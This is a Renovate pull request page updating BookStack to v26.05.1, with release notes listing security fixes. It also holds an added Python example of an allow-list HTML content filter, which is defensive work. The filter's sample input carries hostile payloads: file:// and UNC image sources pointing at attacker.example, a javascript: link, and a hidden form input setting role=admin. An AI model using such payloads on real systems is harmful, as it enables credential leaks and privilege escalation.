⬆️ Update BookStackApp/BookStack to v26#436

Open
renovate[bot] wants to merge 1 commit into main from renovate/bookstackapp-bookstack-26.x

Conversation

@renovate renovate Bot (Contributor) commented Mar 15, 2026

This PR contains the following updates:

Package: BookStackApp/BookStack
Update: major
Change: v25.12.2 -> v26.05.1

Release Notes

BookStackApp/BookStack (BookStackApp/BookStack)

v26.05.1: BookStack v26.05.1

Compare Source

Security Release

This is a security release to address the following vulnerabilities:

  • Attachment requests could be manipulated to leak details/links/metadata (not content) of attachments which the user did not have permission to view.
  • The file:// protocol could be abused in some Windows-specific scenarios to auto-run requests with credential information when viewing exports.
    • This protocol is now filtered from interactive content.
  • The search system could be abused to cause errors and fill logs.

Upgrade is advised for instances with public viewing enabled, or where untrusted users have authenticated access.

Thanks to Stephen O. / Sakusen (Codeberg, Website), Gurmandeep Deol (LinkedIn), Rafael Castilho (X account) and Gabriel Duarte Guerra (GitHub) for responsibly reporting these issues.

Full List of Changes
  • Updated PHP package versions.
  • Updated translations with the latest Crowdin changes.
  • Updated content allow-filtering to only allow the file:// protocol on anchor hrefs, instead of in all dynamic content.
  • Updated attachment update handling to validate permissions before request content.
  • Fixed numeric handling issue in tag search when using non-standard numbers.

v26.05: BookStack v26.05

Compare Source

Upgrade Notices
  • Folder Permissions - Due to some changes in how fonts are used for exports, after updating you may need to ensure that the storage/fonts folder (and all folders within that) are accessible & writable by the web-server. If you start seeing errors on PDF export after updating, it's likely this issue. See this page for guidance on setting permissions.
  • Revision Access - Revision access & visibility is now controlled separately from pages. In some cases, after upgrading, users may no longer be able to access revisions by default (for example, where users had access to view page content but had no role-level view permissions).

v26.03.5: BookStack v26.03.5

Compare Source

Security Release

This is a security release to address a brute-force based vulnerability related to multi-factor authentication, and to update project libraries to help avoid potential vulnerabilities that have been reported in those.

Upgrade is generally advised, but strongly so where multi-factor authentication is used & considered as a critical layer of defense.

Thanks to Stephen O. / Sakusen (Codeberg, Website) for responsibly reporting these issues.

Full List of Changes
  • Updated PHP package versions.
  • Updated MFA verification routes with rate limiting.

v26.03.4: BookStack v26.03.4

Compare Source

Security Release

This is a security release to improve attachment related permission checks, and URL validation for webhooks.

Upgrade is advised if you allow untrusted users to delete attachments, or if untrusted users have permission to create webhooks on instances which make use of the ALLOWED_SSR_HOSTS BookStack env file option.

Thanks to 404_pkj (GitHub) and naruhodoowl (GitHub) for responsibly reporting these issues.

Full List of Changes
  • Updated PHP package versions.
  • Updated attachment actions to align page access check.
  • Updated URL validation in webhooks to help prevent escaping workarounds.
  • Fixed issue where exact search term negation would lead to no results. (#6121)

v26.03.3: BookStack v26.03.3

Compare Source

Full List of Changes

This release contains the following fixes and changes:

  • Updated translations with latest Crowdin changes. (#6067)
  • Updated PHP dependency versions.

v26.03.2: BookStack v26.03.2

Compare Source

Security Release

This is a security release to address a vulnerability where the registration form could be manipulated to gain access to additional roles.

Upgrade is very strongly advised if your instance has user registration enabled.

Thanks to Kwonyong Lee (LinkedIn) for responsibly reporting this issue.
Also thanks to Boustani OSAMA (LinkedIn) for also reporting this before public announcement.

Full List of Changes
  • Updated user creation to only use validated input from registration.
  • Updated PHP package versions.
  • Updated translations with latest Crowdin changes. (#6064)
  • Updated PHP_CodeSniffer repository link. Thanks to @rodrigoprimo. (#6060)
  • Updated WYSIWYG editors to have consistent collapsible block double click behavior. (#6059)

v26.03.1: BookStack v26.03.1

Compare Source

Security Release

This is a security release to address a vulnerability where page content, which should be hidden by permissions, could be visible during certain markdown exports.

We strongly advise that you update your instance if you use permissions to control page visibility.

Thanks to Ghufran Raza Khan (GitHub Profile, LinkedIn Profile) for responsibly reporting this issue.
Also thanks to Alex Dan (GitHub Profile) for also reporting this before public announcement.

Full List of Changes
  • Updated queries used for pages in markdown exports.
  • Updated handling of filenames for file serving.
  • Updated PHP package versions.

v26.03: BookStack v26.03

Compare Source

Upgrade Notices
  • Email/SMTP - The way BookStack sends messages has changed slightly (Specifically, the SMTP HELO domain). This isn't expected to be a breaking change but testing of emails (Using the test send action in Settings > Maintenance) is advised after updating to be sure there's no impact.
  • Theme System - Within a theme directory, the modules/ folder is now dedicated to theme modules. If you happened to already have a folder of this name in your theme, it's advised to use a different folder name instead.
Full List of Changes

Released in v26.03

  • Added new module system to the theme system. (#5998)
  • Added logical theme events for page content render and pre-save. (#6049)
  • Added logical theme event and class to allow inserting custom views before/after others. (#5998)
  • Added logical theme event to allow customising the OIDC authentication URL. (#6014)
  • Updated book delete to return to the parent shelf in a shelf context. (#6029)
  • Updated book read API endpoint to provide parent shelf information. (#6006)
  • Updated cursor to pointer for drawio diagrams. Thanks to @lublak. (#5864)
  • Updated description for per-page display limits. (#6005)
  • Updated emails to use the domain from the APP_URL in the SMTP HELO. (#5990)
  • Updated translations with latest Crowdin changes. (#6007)
  • Fixed empty extra space showing for descriptions when the input is left empty. (#5724)

v25.12.9: BookStack v25.12.9

Compare Source

Security Release

BookStack v25.12.9 has been released.

This is a security release to address a vulnerability where style code in page content could be used to manipulate the page beyond the expected content area in some revision views, opening up risk of potential phishing and/or tracking by bad page editors.

We advise that you update your instance if you allow untrusted users to create or edit pages.

Thanks to Alex Dan (@windbreaker555 on GitHub) for their responsible discovery and reporting of this issue.

Full List of Changes
  • Updated page revision diffs to use content filtering.
  • Updated preference change redirect with stronger origin checks.
  • Updated application PHP dependencies.

v25.12.8: BookStack v25.12.8

Compare Source

Full List of Changes

This release contains the following fixes and changes:

  • Fixed content filtering removing link target attribute, which would impact "New Window" links. (#6034)
  • Fixed content filtering to not remove user references in comments.
  • Updated PHP package versions.

v25.12.7: BookStack v25.12.7

Compare Source

This release specifically addresses a scenario, introduced in v25.12.4, where loading the editor of a page, last updated/created by a different user with blank content, would result in an error.

Full List of Changes

This release contains the following fixes and changes:

  • Updated page document handling to handle empty content instead of throwing an error. (#6026)

v25.12.6: BookStack v25.12.6

Compare Source

This release specifically addresses issues introduced in v25.12.4, where drawings could become non-editable in certain scenarios due to content filtering rules.

Full List of Changes

This release contains the following fixes and changes:

  • Updated content filter to allow required drawio diagram attributes. (#6026)

v25.12.5: BookStack v25.12.5

Compare Source

This release specifically addresses folder permission issues (often showing as an error when attempting to access content) which could occur from changes introduced in v25.12.4.

Full List of Changes

This release contains the following fixes and changes:

  • Updated filter caching folder handling to avoid server filesystem permission issues. (#6023)

v25.12.4: BookStack v25.12.4

Compare Source

Security Release

BookStack v25.12.4 has been released.

This is a security release to address a vulnerability where style code in page content could be used to manipulate the page beyond the expected content area, opening up risk of potential phishing and/or tracking by bad page editors.

We advise that you update your instance if you allow untrusted users to create or edit pages.

Thanks to SeongYun Moon (@Moonster8282 on GitHub) for their responsible discovery and reporting of this issue.

Additional Update Notices

  • Page Content - As of this release, extra layers of filtering have been applied to page content. While we have tried to ensure this has minimal impact on content, it's possible this will lead to extra elements being filtered.
  • Option Change - The ALLOW_CONTENT_SCRIPTS env option is now considered deprecated. It's advised to use the APP_CONTENT_FILTERING option, as documented here, instead if needed.

If you experience issues with your page content being over-filtered feel free to raise an issue on GitHub where we can check if the behaviour is intentional or something which needs to be patched.

You can use the new page content filtering option, with a value of jhf, which should match the prior version filtering, but this will remove a layer of content filtering security so is not recommended.

Full List of Changes
  • Added new option for more granular page filter control.
  • Updated page content filtering to detect extra cases, and to apply a more aggressive allow-list style filter.
  • Updated application PHP dependencies.

v25.12.3: BookStack v25.12.3

Compare Source

Security Release

BookStack v25.12.3 has been released.

This is a security release to address a vulnerability where form elements in page content could be used to trick more privileged users into making API requests.

We strongly advise that you update your instance if you allow untrusted users to create or edit pages.

Thanks to Joud Zakharia of zentrust partners GmbH for the discovery of this vulnerability, and thanks to Sven Faßbender of zentrust partners GmbH for their responsible disclosure and great communication of this issue.

Additional Update Notices

  • Page Content - As of this release, most types of form content are now removed from page content on render. If you applied customizations which made use of in-page form content, you may now need to find alternative methods.
Full List of Changes
  • Updated application PHP dependencies.
  • Updated session-based API authentication to only be active for GET requests.
  • Updated page content filtering to remove many common form elements & attributes.
  • Updated translations with latest Crowdin changes. (#5997)

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


This PR was generated by Mend Renovate. View the repository job log.
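Two of the fixes listed in the release notes above describe the same kind of control: v25.12.3 strips form elements from page content on render, and v26.05.1 narrows the file:// scheme so it survives only on anchor hrefs rather than in every URL-bearing attribute (where, on Windows, an img src pointing at a remote share can make the viewer's browser send an authenticated request). The following is an added illustration of that allow-list policy, written for this page; it is not BookStack's own filter, and the element sets, attribute sets and the treatment of UNC paths as file:// are assumptions chosen for the example. The sample page content at the bottom is constructed.

```python
"""Allow-list HTML content filter (added example; not BookStack's code)."""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Elements dropped together with everything inside them (assumed set).
DROP_WITH_CONTENT = {"script", "style", "input", "button", "select",
                     "textarea", "object", "embed"}
# Elements whose tag is removed while their children are kept.
UNWRAP = {"form"}
# Void elements: they never carry a closing tag.
VOID = {"img", "br", "hr", "input", "source", "track", "wbr", "area",
        "col", "embed"}
# Attributes that hold a URL and therefore get a scheme check.
URL_ATTRS = {"href", "src", "poster", "data", "xlink:href"}
# Form-wiring attributes dropped regardless of value.
DROP_ATTRS = {"action", "formaction", "method", "formmethod", "enctype"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}  # "" = relative URL


def url_scheme(value: str) -> str:
    """Lower-cased scheme after undoing the obfuscations browsers tolerate.

    Browsers remove tab/CR/LF from a URL before parsing, so the filter must
    too, or a scheme split by a tab would pass the check and still resolve.
    A UNC path (two leading backslashes) is treated as file:, since on
    Windows it triggers the same outbound request (assumption).
    """
    cleaned = "".join(ch for ch in value if ch not in "\t\r\n").strip()
    if cleaned.startswith("\\\\"):
        return "file"
    return urlsplit(cleaned).scheme.lower()


def url_allowed(tag: str, attr: str, value: str) -> bool:
    """http(s)/mailto/relative anywhere; file: only on <a href>; else reject."""
    scheme = url_scheme(value)
    if scheme in SAFE_SCHEMES:
        return True
    if scheme == "file":
        return tag == "a" and attr == "href"
    return False  # javascript:, data:, vbscript:, anything unknown


class ContentFilter(HTMLParser):
    """Re-serialises the input, emitting only what the allow-list permits.

    Comments, doctype and processing instructions vanish because the base
    class's default handlers for them do nothing. HTMLParser hands over
    attribute values already entity-decoded, so an encoded scheme such as
    &#102;ile: is judged in its decoded form.
    """

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.skip_depth = 0  # >0 while inside an element dropped with content

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            if tag not in VOID:
                self.skip_depth += 1
            return
        if self.skip_depth or tag in UNWRAP:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name in DROP_ATTRS:
                continue  # inline event handlers and form wiring never survive
            if name in URL_ATTRS and not url_allowed(tag, name, value):
                continue  # offending attribute dropped, element itself kept
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            if tag not in VOID and self.skip_depth:
                self.skip_depth -= 1
            return
        if self.skip_depth or tag in UNWRAP or tag in VOID:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            # convert_charrefs=True delivers decoded text, so re-escape it.
            self.out.append(html.escape(data, quote=False))


def filter_content(raw_html: str) -> str:
    parser = ContentFilter()
    parser.feed(raw_html)
    parser.close()
    return "".join(parser.out)


# Constructed sample page content; not taken from any real instance.
SAMPLE = (
    '<p>See <a href="file:///C:/share/doc.txt">the doc</a> and '
    '<img src="file://attacker.example/x.png" alt="x"> '
    '<img src="\\\\attacker.example\\c$\\x.png"> '
    '<a href="javascript:alert(1)" onclick="x()">click</a></p>'
    '<form action="/api/users/1" method="post">'
    '<input type="hidden" name="role" value="admin"><button>Save</button>text</form>'
)

if __name__ == "__main__":
    print(filter_content(SAMPLE))
```

Running the block prints the sample with the anchor's file:// link intact, both image sources removed (the element stays), the javascript: href and onclick gone, the form unwrapped and its input and button removed. The point worth keeping from it is the per-(element, attribute) scheme decision rather than a global scheme list: the same URL is acceptable in one position and not in another. A production deployment would hand this job to a maintained sanitizer library rather than a hand-rolled parser; the example only shows the shape of the policy.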

@renovate renovate Bot added dependencies Upgrade or downgrade of project dependencies. no-stale This issue or PR is exempted from the stable bot. labels Mar 15, 2026
@renovate renovate Bot force-pushed the renovate/bookstackapp-bookstack-26.x branch from 246141e to f8d1c76 on March 17, 2026 12:35
@renovate renovate Bot force-pushed the renovate/bookstackapp-bookstack-26.x branch 2 times, most recently from f9e616f to 57d2708 on April 6, 2026 01:33
@renovate renovate Bot force-pushed the renovate/bookstackapp-bookstack-26.x branch from 57d2708 to bea3b5b on April 30, 2026 15:14
@renovate renovate Bot force-pushed the renovate/bookstackapp-bookstack-26.x branch from bea3b5b to d4ba94a on May 22, 2026 07:52
@renovate renovate Bot force-pushed the renovate/bookstackapp-bookstack-26.x branch from d4ba94a to 1447ee9 on May 30, 2026 20:13
@renovate renovate Bot force-pushed the renovate/bookstackapp-bookstack-26.x branch from 1447ee9 to cc9a1a2 on June 20, 2026 11:06